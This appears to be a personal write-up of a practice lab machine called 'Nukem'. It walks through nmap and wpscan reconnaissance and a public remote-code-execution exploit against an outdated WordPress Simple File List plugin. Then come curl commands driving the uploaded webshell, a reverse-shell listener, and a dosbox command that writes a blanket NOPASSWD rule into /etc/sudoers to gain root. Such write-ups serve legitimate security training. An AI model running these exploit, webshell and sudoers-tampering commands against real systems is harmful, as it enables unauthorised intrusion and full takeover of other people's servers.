Machine Information
- Machine Name: Nukem
- Machine Difficulty: intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Nmap scan report for 192.168.155.105
Host is up, received user-set (0.017s latency).
Scanned at 2024-10-24 11:40:56 +08 for 171s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:6a:f5:d3:30:08:7a:ec:38:28:a0:88:4d:75:da:19 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIa7leEeVssjdrJAMl1xs+qCC7DvEgvhDmYxn7oFKkzQdWQXNwPDaf19b+8uxImEAQ3uRXYg56MItfQ54pTuDpJSuuSfCXyqH9/o5S+gugCgkGiWRTlyXAmCe4uM4ZZD09yChsJ0LdPKvqM19l5o+8KCBuXAGOX7Co60oUpD3+xINAS/XQYFdY1RARpIsuzd3qUH
keKJvGp2hbI6b2bgfcjTcPgBaLKLMa6OZ208whcHdYwJdOnc2m3mi2o9v+ETK+P8exJ1/DTIYLLVlo0BPMqlCE2R4JyEfp8RQeggq42yHOMmBI6pQ/BhClgheiPDhF+hQLNafLgkLeHv625eFq7V8bwi2Uy7/NV8jip1FobFhaT2L/MiRHnx7my4Cxk0BzoAvj0fOzOXouT5rMon6o14x/HTQBqORFhLvTNkCnPE0nen
8ohQ05R0oWFiVwH74OaLHvwmzUuy8d1Wln5rW26q+UjZy1AIGpRHvyfEV5dzmB0ujnrE8Io702tIb/ssM=
| 256 43:3b:b5:bf:93:86:68:e9:d5:75:9c:7d:26:94:55:81 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLFrQmyRArhVBZ7HJi6W3YN/7sFuTBg5RLoffgVyCRaVpqj/VAwL3c85iE7s1x61oRu7CiVIvzOcYAMh5BfOjuI=
| 256 e3:f7:1c:ae:cd:91:c1:28:a3:3a:5b:f6:3e:da:3f:58 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMWYiSpSV5PFfFK8fw7UZ1MAMHej2xBONdUi5CSr7huF
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-generator: WordPress 5.5.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Retro Gamming – Just another WordPress site
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
3306/tcp open mysql? syn-ack ttl 61
| fingerprint-strings:
| NULL, NessusTPv11, OfficeScan, SIPOptions, X11Probe, adbConnect, beast2, couchbase-data, giop, gkrellm, mongodb, pervasive-btrieve, redis-server:
|_ Host '192.168.45.195' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '192.168.45.195' is not allowed to connect to this MariaDB server
5000/tcp open http syn-ack ttl 61 Werkzeug httpd 1.0.1 (Python 3.8.5)
|_http-title: 404 Not Found
|_http-server-header: Werkzeug/1.0.1 Python/3.8.5
13000/tcp open http syn-ack ttl 61 nginx 1.18.0
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Login V14
|_http-server-header: nginx/1.18.0
36445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.6.2
As usual, I started by exploring web ports.
Port 80
According to nmap result, it’s a WordPress site. I then use wpscan to check if there’s any vulnerable plugin in it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
wpscan --url http://192.168.155.105 -e p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.155.105/ [192.168.155.105]
[+] Started: Thu Oct 24 15:14:16 2024
...
[i] Plugin(s) Identified:
[+] simple-file-list
| Location: http://192.168.155.105/wp-content/plugins/simple-file-list/
| Last Updated: 2024-10-19T15:39:00.000Z
| [!] The version is out of date, the latest version is 6.1.13
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.2.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.155.105/wp-content/plugins/simple-file-list/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.155.105/wp-content/plugins/simple-file-list/readme.txt
[+] tutor
| Location: http://192.168.155.105/wp-content/plugins/tutor/
| Last Updated: 2024-09-19T06:24:00.000Z
| [!] The version is out of date, the latest version is 2.7.6
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.5.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.155.105/wp-content/plugins/tutor/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.155.105/wp-content/plugins/tutor/readme.txt
...
I noticed that there’s 2 plugin found that was outdated. I then check on searchsploit and see if there’s any existing exploit related to the plugin.
1
2
3
4
5
6
7
8
9
10
11
searchsploit simple file list
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Joomla! Component mod_simpleFileLister 1.0 - Directory Traversal | php/webapps/17736.txt
Simple Directory Listing 2 - Cross-Site Arbitrary File Upload | php/webapps/7383.txt
WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload | php/webapps/48979.py
WordPress Plugin Simple File List 4.2.2 - Remote Code Execution | php/webapps/48449.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
I then tried the remote code execution as it seems to be more interesting.
1
2
3
4
5
6
7
8
9
python 48449.py http://192.168.155.105
[ ] File 842.png generated with password: c0a15feddbdb865194b18ea4af06a9da
[ ] File uploaded at http://192.168.155.105/wp-content/uploads/simple-file-list/842.png
[ ] File moved to http://192.168.155.105/wp-content/uploads/simple-file-list/842.php
[+] Exploit seem to work.
[*] Confirmning ...
[+] Exploit work !
URL: http://192.168.155.105/wp-content/uploads/simple-file-list/842.php
Password: c0a15feddbdb865194b18ea4af06a9da
After this is done, I could just execute command using the URL.
1
2
3
curl -X POST http://192.168.155.105/wp-content/uploads/simple-file-list/842.php -d 'password=c0a15feddbdb865194b18ea4af06a9da&cmd=system("whoami;id");'
http
uid=33(http) gid=33(http) groups=33(http)
Now that I could execute command, time to get reverse shell.
1
2
3
4
5
6
7
8
nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.155.105] 42870
bash: cannot set terminal process group (350): Inappropriate ioctl for device
bash: no job control in this shell
[http@nukem simple-file-list]$ whoami
whoami
http
Now that I have shell but not root, time to privilege escalation.
Privilege Escalation
I always started out with linpeas.sh since this is a linux machine.
1
2
3
4
5
[http@nukem simple-file-list]$ find / -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chage
/usr/bin/dosbox
/usr/bin/newgrp
I noticed this dosbox seems to be highlighted by linpeas.sh which mean there’s a high chance that I could abuse this and escalate to root. I then check GTFOBin and see whats the privilege escalation method.
1
2
3
4
sudo install -m =xs $(which dosbox) .
LFILE='\path\to\file_to_write'
./dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit
According to the explanation, I could perform file read and file write with this dosbox. I then try to write into /etc/sudoers which allow everyone to run every command as root.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[http@nukem simple-file-list]$ dosbox -c 'mount c /' -c "echo ALL ALL=(ALL) NOPASSWD: ALL >> c:/etc/sudoers" -c exit
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
CONFIG: Using default settings. Create a configfile to change them
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:/etc/sudoers
Once it’s written into the file, I tried running sudo -l now and see if I could run sudo command.
1
2
3
4
5
6
[http@nukem simple-file-list]$ sudo -l
Runas and Command-specific defaults for http:
Defaults!/etc/ctdb/statd-callout !requiretty
User http may run the following commands on nukem:
(ALL) NOPASSWD: ALL
Now I could just get root shell easily.
1
2
3
[http@nukem simple-file-list]$ sudo su root
[root@nukem simple-file-list]# whoami
root
Thats how I get the root user ~
Things I learned from this machine
- try to use more
wpscanand check the outdated plugin - the exploit uses password with post request which is new to me
dosboxprivilege escalation to write file into/etc/sudoersor/etc/passwd- There’s a part where I see other’s writeup and missed out this
.vncfolder which i could download thepasswdfile and get a rdp usingvncviewer